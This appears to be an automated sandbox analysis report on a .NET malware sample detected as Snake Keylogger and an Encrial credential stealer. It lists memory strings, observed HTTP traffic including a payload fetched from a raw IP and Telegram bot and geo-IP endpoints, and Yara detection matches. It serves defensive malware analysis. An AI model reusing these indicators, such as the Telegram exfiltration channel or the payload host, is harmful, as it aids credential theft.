Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.345941905.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346045053.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krs-c
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comduv
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comn
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.guw
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cnCo
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cnW
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.-x
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cnorm
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app/xml/84.17.52.15
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app/xml/84.17.52.15x
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app4Wk
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434562162.0000000003239000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434179664.00000000030FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434562162.0000000003239000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434179664.00000000030FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434562162.0000000003239000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434179664.00000000030FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET /xml/84.17.52.15 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fact_Sptqaevl.bmp HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
